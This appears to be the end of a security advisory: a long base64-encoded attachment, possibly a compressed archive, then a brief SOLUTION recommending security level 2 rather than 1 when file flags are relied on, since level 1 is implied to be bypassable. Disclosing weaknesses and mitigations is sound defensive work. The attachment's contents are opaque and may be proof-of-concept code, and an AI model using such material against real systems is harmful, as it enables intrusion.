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
-----
SOLUTION
If fileflags are part of your security-concept, use security level
2, not 1. (sure, level 2 might also have been broken...)